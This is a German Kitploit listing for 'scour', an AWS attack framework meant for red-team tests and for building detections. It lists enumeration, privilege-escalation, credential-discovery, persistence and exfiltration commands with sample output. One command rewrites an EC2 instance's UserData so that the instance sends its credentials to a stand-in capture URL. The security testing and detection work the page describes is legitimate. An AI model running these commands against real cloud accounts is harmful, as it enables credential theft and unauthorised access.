Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
scour — Modulbasiertes AWS-Exploitation-Framework für Red-Team-Tests und Blue-Team-Analysen. Emuliert Angriffsmuster in der AWS-Steuerungsebene mit einzigartigem UA-Tracking für die Erkennungsentwicklung. | Kitploit
Tools/GitHubGitHub/grines/scour
Privilege EscalationExploitationLaterale BewegungPost-ExploitationPenetrationstestsCloud-SicherheitRed Teaming
GitHubgrines/scour

scour

Modulbasiertes AWS-Exploitation-Framework für Red-Team-Tests und Blue-Team-Analysen. Emuliert Angriffsmuster in der AWS-Steuerungsebene mit einzigartigem UA-Tracking für die Erkennungsentwicklung.

Repository anzeigen
12717vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Scour - AWS-Erkennungsframework

Dieses Tool wird verwendet, um Angriffsmuster innerhalb der AWS Controlplane zu emulieren. Jeder Angriff wird mit einer spezifischen UA für das blaue Team markiert, um darauf hinzuweisen.

Status

  • Dies ist noch eine aktive Baustelle. **Viele Fehler

  • Noch nicht produktionsreif

  • Wo Sie Probleme melden können: https://github.com/grines/scour/issues

  • Gepflegt von: grines

Was ist Scour?

Scour ist ein modernes modulbasiertes AWS-Exploitation-Framework, geschrieben in Golang, entwickelt für Tests des roten Teams und Analysen des blauen Teams. Scour enthält moderne Techniken, die verwendet werden können, um Umgebungen anzugreifen oder Erkennungen für die Verteidigung aufzubauen.

Funktionen

  • Befehlsvervollständigung
  • Dynamische Auflistung von Ressourcen
  • Befehlsverlauf
  • Blau-Team-Modus (markiert Angriffe mit eindeutigem User Agent)

Installation

Scour ist in golang geschrieben, sodass es einfach als Binärdatei verteilt werden kann.

##Abrufbar

go get github.com/grines/scour

##Erstellen

go build main.go

Für eine detailliertere und benutzerfreundlichere Installationsanleitung besuchen Sie bitte die Wiki's Installationsanleitung. **in Kürze

Scours Module

Scour verwendet eine Reihe von Modulen:

  • Operationen (2)
  • Enumerierung (7)
  • Privilegienerweiterung (3)
  • Seitwärtsbewegung (2)
  • Umgehung (5)
  • Credential Discovery (4)
  • Ausführung (2)
  • Persistenz (7)
  • Exfiltration (1)

Hinweise

  • Scour wird auf allen Linux/OSX-Systemen unterstützt.
  • Scour ist Open-Source-Software und wird unter der BSD-3-Clause-Lizenz vertrieben.

Erste Schritte

Beim ersten Start von Scour,

Grundlegende Befehle in Scour

  • token profile <profile_name> <region> listet die verfügbaren AWS-Profile in ~/aws/credentials auf.
  • token AssumeRole <role_name> <region> nimmt eine Rolle aus demselben oder einem anderen Konto an. ** erfordert aktive Sitzung
  • help module gibt die entsprechenden Hilfeinformationen für das angegebene Modul zurück. **Hilfe folgt
  • attack evasion <tactic> führt das angegebene Modul mit seinen Standardparametern aus.

Ausführen von Scour über die Befehlszeile

  • scour wechselt in den CLI-Modus
  • Not Connected <> token profile apiuser us-east-1 legt die Sitzung für Befehle fest, die eine solche erfordern
  • Connected <apiuser/us-east-1> aktiv mit einem AWS-Profil aus (~,/aws/credentials) in (Region) verbunden
  • Connected <apiuser/us-east-1> attack enum <attack> Tab-Vervollständigung mit Liste der verfügbaren Aufzählungstaktiken
  • Connected <apiuser/us-east-1> attack privesc <attack> Tab-Vervollständigung mit Liste der verfügbaren Privilegienerweiterungstaktiken
  • Connected <apiuser/us-east-1> attack lateral <attack> Tab-Vervollständigung mit Liste der verfügbaren Seitwärtsbewegungstaktiken
  • Connected <apiuser/us-east-1> attack evasion <attack> Tab-Vervollständigung mit Liste der verfügbaren Umgehungstaktiken
  • Connected <apiuser/us-east-1> attack creds <attack> Tab-Vervollständigung mit Liste der verfügbaren Credential-Discovery-Taktiken
  • Connected <apiuser/us-east-1> attack execute <attack> Tab-Vervollständigung mit Liste der verfügbaren Ausführungstaktiken

Enumeration

  • Connected <apiuser/us-east-1> attack enum IAM IAM-Erkennung
root@kitploit:~
+-------------+---------------------+------------------+---------------+--------------+
|    USER     |  MANAGED POLICIES   | INLINE POLICIES  |    GROUPS     | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin       | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |
| EC2         | AmazonEC2FullAccess |                  |               | true         |
+-------------+---------------------+------------------+---------------+--------------+
  • Connected <apiuser/us-east-1> attack enum Roles Rollenerkennung
root@kitploit:~
UA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
|                            ROLE                            | PRINCIPAL TYPE |                  IDENTITY/SERVICE                   | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m                                | AWS            | [arn:aws:iam::861******:root                     | true         |
|                                                            |                | codebuild.amazonaws.com]                            |              |
| Amazon_CodeBuild_f2DOFPjMHK                                | Service        | [codebuild.amazonaws.com]                           | true         |
| Amazon_CodeBuild_HS59ko7lxn                                | Service        | [codebuild.amazonaws.com]                           | true         |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
  • Connected <apiuser/us-east-1> attack enum EC2 EC2-Erkennung
root@kitploit:~
UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
|     INSTANCEID      |                  INSTANCE PROFILE                   |     VPC      | PUBLICIP |   PRIVATEIP   |   SECURITY GROUPS    | PORTS  |  STATE  | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None                                                | vpc-7e830c1a | None     | 172.31.53.199 | sg-09fcd28717cf4f512 | 80*    | stopped | false        | true     |
|                     |                                                     |              |          |               |                      | 22*    |         |              |          |
|                     |                                                     |              |          |               |                      | 5000*  |         |              |          |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.45.96  | sg-61b1fd07          | All*   | stopped | true         | true     |
|                     |                                                     |              |          |               |                      | 8888*  |         |              |          |
| i-01b265a5fdc45df57 | None                                                | vpc-7e830c1a | None     | 172.31.38.118 | sg-0392f752f9b849d3f | 3389*  | stopped | false        | true     |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.39.199 | sg-006543a34d2f70028 | 22*    | stopped | true         | true     |
| i-0d95790b5e7ddff23 | None                                                | vpc-7e830c1a | None     | 172.31.12.57  | sg-e1a50dac          | 33391* | stopped | false        | true     |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
  • Connected <apiuser/us-east-1> attack enum S3 S3-Erkennung
root@kitploit:~
UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
|                  BUCKET                   | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION |  REGION   |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a               | false     | false     | false        |             | false               |             | false       | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true      | false     | false        |             | false               |             | false       |           |
| bullsecu*********                         | true      | true      | false        |             | false               |             | false       |           |
| connect-6ec*****ad67                      | false     | false     | false        |             | false               |             | false       |           |
| connect-******5337c3                      | false     | false     | false        |             | false               |             | false       |           |
| ransom********                            | true      | false     | false        |             | false               |             | false       |           |
| red********                               | false     | false     | false        |             | false               |             | false       |           |
| rep-*****                                 | false     | false     | false        |             | false               |             | false       | us-west-2 |
| terraform*******                          | false     | false     | false        |             | false               |             | false       |           |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
  • Connected <apiuser/us-east-1> attack enum Groups Gruppenerkennung
root@kitploit:~
UA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
|                     GROUP                     |      POLICIES       | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2                                           | SecurityAudit       | false        |                 | false        |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 |                     | false        |                 | false        |
| TestGroup                                     | AmazonEC2FullAccess | true         |                 | false        |
|                                               | SecurityAudit       |              |                 |              |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
  • Connected <apiuser/us-east-1> attack enum Network Netzwerkerkennung
root@kitploit:~
TBD

PrivilegeEscalation

  • Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data Meta-Daten-Anmeldeinformationen von EC2 stehlen. Instance stoppen / Userdata aktualisieren, um Anmeldeinformationen an die angegebene URL zu senden / Instance starten (sendet EC2-Token an die URL).
root@kitploit:~
[Sun May  9 06:10:16 2021]  INF  Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May  9 06:10:46 2021]  INF  Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May  9 06:10:47 2021]  INF  Starting Instance i-0f5604708c0b51429 - State: pending

CredentialDiscovery

  • Connected <apiuser/us-east-1> attack creds UserData Anmeldeinformationen aus EC2 Userdata auslesen
root@kitploit:~
UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
|     INSTANCEID      |       RULE       |                                    FINDING                                    |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook    | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword                                                      |
+---------------------+------------------+-------------------------------------------------------------------------------+
  • Connected <apiuser/us-east-1> attack creds SSM Anmeldeinformationen aus Systems Manager auslesen
root@kitploit:~
UA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE |        VALUE         |
+------------+----------+----------------------+
| Test       | text     | thismightbeapassword |
+------------+----------+----------------------+
  • Connected <apiuser/us-east-1> attack creds ECS Anmeldeinformationen aus ECS auslesen
root@kitploit:~
UA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret      | heere | sample-app |
+-------------+-------+------------+

Haftungsausschlüsse und die AWS Acceptable Use Policy

  • Nach unserem besten Wissen sind die Fähigkeiten von Scour konform mit der AWS Acceptable Use Policy, aber als flexibles und modulares Tool können wir nicht garantieren, dass dies in jeder Situation zutrifft. Es liegt in Ihrer alleinigen Verantwortung sicherzustellen, dass Ihre Nutzung von Scour mit der AWS Acceptable Use Policy konform ist.
  • Je nachdem, welche AWS-Dienste Sie nutzen und welche Tests Sie planen, müssen Sie möglicherweise eine Autorisierung von Amazon beantragen, bevor Sie Scour tatsächlich gegen Ihre Infrastruktur einsetzen. Die Entscheidung, ob eine solche Autorisierung erforderlich ist, liegt in Ihrer Verantwortung.
  • Wie bei jedem Penetrationstest-Werkzeug liegt es in Ihrer Verantwortung, vor der Nutzung von Scour außerhalb Ihrer Umgebung die entsprechende Genehmigung einzuholen.
  • Scour ist Software, die ohne jegliche Gewährleistung geliefert wird. Durch die Nutzung von Scour übernehmen Sie die vollständige Verantwortung für alle daraus resultierenden Ergebnisse.
Tool herunterladen
  • Connected <apiuser/us-east-1> attack persist <attack> Tab-Vervollständigung mit Liste der verfügbaren Persistenztaktiken
  • Connected <apiuser/us-east-1> attack exfil <attack> Tab-Vervollständigung mit Liste der verfügbaren Exfiltrationstaktiken